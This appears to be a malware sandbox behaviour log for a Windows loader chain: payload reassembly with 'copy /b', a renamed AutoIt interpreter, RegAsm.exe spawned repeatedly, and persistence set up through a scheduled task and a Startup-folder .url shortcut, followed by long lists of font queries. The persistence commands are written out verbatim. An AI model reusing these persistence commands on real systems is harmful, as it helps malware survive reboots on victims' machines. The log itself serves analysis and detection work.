Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VegetablesIndividualBindingGba" Ever	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\684126\Intake.pif Intake.pif C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\turtleharbor.url" & echo url="c:\users\user\appdata\local\securedata technologies\turtleharbor.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\turtleharbor.url" & exit
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\turtleharbor.url" & echo url="c:\users\user\appdata\local\securedata technologies\turtleharbor.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\turtleharbor.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

18_2_003688CD

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00374F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_00374F1C

Source: Intake.pif, 0000000A.00000000.1668778484.0000000000E86000.00000002.00000001.01000000.00000005.sdmp, Intake.pif, 0000000A.00000003.1677117559.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, TurtleHarbor.pif, 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TurtleHarbor.pif	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003279000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003279000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002A63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_0033885B cpuid

18_2_0033885B

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
